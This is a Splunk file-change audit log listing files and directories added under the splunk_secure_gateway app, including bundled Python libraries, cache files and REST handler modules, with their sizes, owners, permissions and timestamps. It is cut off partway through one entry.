Audit:[timestamp=10-06-2022 17:42:17.776, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/asyncio", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.772, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:17.768, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/__init__.py", isdir=0, size=53, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.663, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/zipp.py", isdir=0, size=8089, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.659, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/zipp-3.4.1.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.654, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl-1.6.3.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.648, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/yarl", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.644, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3-1.26.4.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.640, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/urllib3", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.636, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/typing_extensions.py", isdir=0, size=83727, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.632, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/typing_extensions-3.7.4.3.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.627, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.624, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunk_sdk-1.6.15.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.620, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protos-1.2.7+ged85dae.dirty.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.616, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splapp_protocol", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.611, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_python_sdk-1.6.3.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.606, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protos-1.2.7+ged85dae.dirty.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.602, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protocol", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.598, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers-2.3.0.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.594, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/sortedcontainers", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.590, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib-3.0.5.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.586, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/solnlib", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.582, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/six.py", isdir=0, size=34159, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.578, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/six-1.15.0.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.573, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/semver.py", isdir=0, size=36620, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.568, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/semver-2.13.0.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.563, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics-2.1.0.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.560, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/schematics", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.555, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests-2.25.1.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.551, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/requests", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.547, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/protobuf-3.6.1.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.542, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/protobuf-3.6.1-py3.7-nspkg.pth", isdir=0, size=539, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.525, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/pkg_resources", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.520, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/past", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.515, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict-5.1.0.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.510, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/multidict", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.504, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libpasteurize", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.498, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/libfuturize", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.494, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle-2.0.0.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.489, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/jsonpickle", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.485, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata-3.10.0.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.481, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/importlib_metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.476, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna-2.10.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.472, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/idna", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.467, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/google", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.463, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future-0.18.2.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.459, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.453, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/distutils-precedence.pth", isdir=0, size=152, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.449, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.443, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet-4.0.0.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.438, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/chardet", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.434, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/certifi-2020.12.5.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.430, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/certifi", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.414, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.410, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attrs-20.3.0.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.406, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/attr", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.402, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/async_timeout-3.0.1.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.398, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/async_timeout", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.392, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp-3.7.4.post0.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.388, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.384, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/_distutils_hack", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.380, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:16.874, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/README/securegateway.conf.spec", isdir=0, size=3375, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:16.871, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/README/inputs.conf.spec", isdir=0, size=1225, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:16.867, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/README/alert_actions.conf.spec", isdir=0, size=400, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:16.763, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/encryption/key_migrator.py", isdir=0, size=1348, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.759, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/encryption/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.755, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/metrics/__pycache__/websocket_metrics.cpython-37.pyc", isdir=0, size=1015, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.750, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/metrics/__pycache__/telemetry_client.cpython-37.pyc", isdir=0, size=6539, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.746, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/metrics/__pycache__/metrics_collector.cpython-37.pyc", isdir=0, size=4843, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:12 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.742, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/metrics/__pycache__/dashboard_request_metrics.cpython-37.pyc", isdir=0, size=1045, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.736, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/metrics/__pycache__/__init__.cpython-37.pyc", isdir=0, size=236, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.731, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/metrics/websocket_metrics.py", isdir=0, size=1107, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.728, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/metrics/telemetry_client.py", isdir=0, size=7046, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.724, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/metrics/metrics_collector.py", isdir=0, size=4413, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.721, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/metrics/dashboard_request_metrics.py", isdir=0, size=1215, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.717, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/metrics/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:12 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:16.713, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/metrics/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.609, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/opt_in/__pycache__/opt_in_handler.cpython-37.pyc", isdir=0, size=4381, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.605, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/opt_in/__pycache__/__init__.cpython-37.pyc", isdir=0, size=172, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.601, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/opt_in/opt_in_handler.py", isdir=0, size=4753, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.597, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/opt_in/oia_handler.py", isdir=0, size=1508, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.593, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/opt_in/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:16.588, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/opt_in/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.584, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/qr_handlers/is_dashboard_mobile_compatible.py", isdir=0, size=1792, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.581, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/debug/e2e_test/wss.py", isdir=0, size=5560, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.576, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/debug/e2e_test/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.472, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/debug/util.py", isdir=0, size=299, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.468, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/debug/test_websocket.py", isdir=0, size=7625, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.462, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/debug/restart_ssg.py", isdir=0, size=1630, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.457, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/debug/kvstore_dashboard_client.py", isdir=0, size=4045, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.454, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/debug/e2e_test", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.448, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/debug/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.444, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/util/__pycache__/helper.cpython-37.pyc", isdir=0, size=1809, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:12 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.440, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/util/__pycache__/errors.cpython-37.pyc", isdir=0, size=1334, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.436, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/util/__pycache__/__init__.cpython-37.pyc", isdir=0, size=170, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.432, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/util/utils.py", isdir=0, size=1980, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.429, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/util/helper.py", isdir=0, size=1921, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.426, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/util/errors.py", isdir=0, size=540, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.422, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/util/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:12 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:16.419, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/util/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.315, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/__pycache__/async_splunk_client.cpython-37.pyc", isdir=0, size=20712, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.310, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/__pycache__/async_spacebridge_client.cpython-37.pyc", isdir=0, size=3144, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.306, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/__pycache__/async_non_ssl_client.cpython-37.pyc", isdir=0, size=956, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.302, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/__pycache__/async_kvstore_client.cpython-37.pyc", isdir=0, size=6962, gid=41812, 